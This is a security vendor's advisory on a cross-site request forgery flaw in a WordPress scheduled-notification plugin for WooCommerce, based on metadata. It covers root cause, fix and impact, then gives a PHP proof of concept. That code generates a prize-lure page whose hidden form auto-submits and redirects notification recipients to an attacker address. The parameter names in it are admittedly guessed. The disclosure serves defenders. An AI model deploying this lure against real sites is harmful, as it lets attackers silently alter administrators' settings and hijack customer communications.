Atomic Edge analysis of CVE-2026-1455 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Whatsiplus Scheduled Notification for Woocommerce WordPress plugin versions up to and including 1.0.1. The vulnerability resides in the ‘wsnfw_save_users_settings’ AJAX action handler. Attackers can exploit this flaw to modify plugin configuration settings without proper authentication.
Atomic Edge research indicates the root cause is missing nonce validation on the AJAX action handler. WordPress AJAX endpoints require a nonce (number used once) token to verify the request originates from a legitimate user session. The plugin’s handler likely registers the action via `wp_ajax_wsnfw_save_users_settings` without calling `check_ajax_referer()` or `wp_verify_nonce()`. This conclusion is inferred from the CWE-352 classification and the vulnerability description stating missing nonce validation. Without source code, this remains a logical deduction based on standard WordPress security patterns.
Exploitation requires an attacker to trick an authenticated administrator into submitting a forged request. The attack vector is a crafted HTML page or link that triggers a POST request to the WordPress admin AJAX endpoint. The target endpoint is `/wp-admin/admin-ajax.php`. The malicious payload must include the parameter `action=wsnfw_save_users_settings` along with other plugin-specific parameters that control configuration settings. The attacker can host this payload on a separate domain and use social engineering to induce an administrator click.
Remediation requires adding nonce verification to the vulnerable AJAX handler. The plugin developer should modify the function handling `wsnfw_save_users_settings` to include a call to `check_ajax_referer(‘nonce_action_name’)` or `wp_verify_nonce($_POST[‘_wpnonce’], ‘nonce_action_name’)`. A valid nonce must also be generated and included in the plugin’s admin interface forms that trigger this AJAX action. This fix aligns with WordPress coding standards for securing AJAX endpoints.
Successful exploitation allows attackers to modify the plugin’s configuration settings. The exact impact depends on what settings the `wsnfw_save_users_settings` action controls. Based on the plugin’s purpose for scheduled WooCommerce notifications, attackers could potentially alter notification templates, recipient lists, or scheduling parameters. This could lead to notification spam, data leakage via modified message content, or disruption of automated customer communications. The CVSS vector indicates low impact on confidentiality and availability, with low impact on integrity limited to the plugin’s settings.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1455 - Whatsiplus Scheduled Notification for Woocommerce <= 1.0.1 - Cross-Site Request Forgery to 'wsnfw_save_users_settings' AJAX Action
<?php
/**
* Proof-of-Concept for CVE-2026-1455 (CSRF)
* This script generates an HTML page that triggers a CSRF attack against the vulnerable AJAX endpoint.
* Assumptions:
* 1. The target WordPress site has the vulnerable plugin (<=1.0.1) installed.
* 2. The attacker can lure an authenticated administrator to visit this page.
* 3. The exact parameters for the 'wsnfw_save_users_settings' action are unknown; placeholder parameters are used.
* 4. The attack modifies plugin settings; the specific settings parameter names are inferred as 'setting_value'.
*/
$target_url = 'http://vulnerable-wordpress-site.com';
// Construct the AJAX endpoint URL
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Generate the malicious HTML form
$html = <<<HTML
<!DOCTYPE html>
<html>
<head>
<title>Click to Claim Prize</title>
</head>
<body>
<h1>You've Won a Prize!</h1>
<p>Click the button below to claim your reward.</p>
<!-- Hidden form that auto-submits via JavaScript -->
<form id="csrf_form" action="$ajax_url" method="POST">
<input type="hidden" name="action" value="wsnfw_save_users_settings" />
<!-- Assumed parameter names based on plugin functionality -->
<input type="hidden" name="notification_enabled" value="0" />
<input type="hidden" name="recipient_list" value="attacker@example.com" />
<input type="hidden" name="message_template" value="Hacked by CSRF" />
</form>
<script>
// Auto-submit the form after a short delay
setTimeout(function() {
document.getElementById('csrf_form').submit();
}, 1000);
</script>
</body>
</html>
HTML;
echo $html;
?>
